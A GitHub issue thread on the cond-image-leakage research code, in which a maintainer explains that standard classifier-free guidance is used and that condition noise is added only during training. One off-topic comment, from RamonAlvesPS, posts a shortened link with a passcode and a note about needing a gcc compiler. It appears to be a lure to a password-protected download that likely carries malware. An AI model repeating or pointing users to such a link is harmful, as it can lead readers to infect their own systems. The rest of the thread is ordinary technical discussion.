### ISSUE TITLE
when using the proposed training strategy, should the cfg be modified?

### ISSUE THREAD

**Issue by qinghew** [thu-ml/cond-image-leakage#10]
i did not find the code about the modified cfg. if you have modified it, can you point out where the code is for me?

**Comment by RamonAlvesPS** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by zhuhz22** [comment]
Hi @qinghew ,
Thank your for your attention to our work! We just follow a typical CFG strategy, since our TimeNoise doesn't need a specially crafted CFG ratio. 
As for DynamiCrafter, please refer to line 711\~722 ,`examples/DynamiCrafter/lvdm/models/ddpm3d.py`，which follows the original DynamiCrafter training code;
and for SVD, refer to line 51\~54 , `examples/SVD/svd/training/loss.py`.

**Comment by qinghew** [comment]
thanks for your reply! does the inference need these codes? if not, is there a gap between train and inference?
```
        sigma_s = get_beta_s(t/1000.0, self.a,self.beta_m)
        condition_noise = torch.randn_like(img_emb)
        sigma_s = sigma_s.reshape([img_emb.shape[0], 1, 1]).to(x.device)
        img_emb = img_emb + sigma_s * condition_noise
```

**Comment by zhuhz22** [comment]
Hi @qinghew , 
There's no need to add noise to conditional images for inference, because during the training phase, the model at each time step learns to handle conditional images with varying noise levels following a noise distribution.

**Comment by qinghew** [comment]
thanks you! ^_^
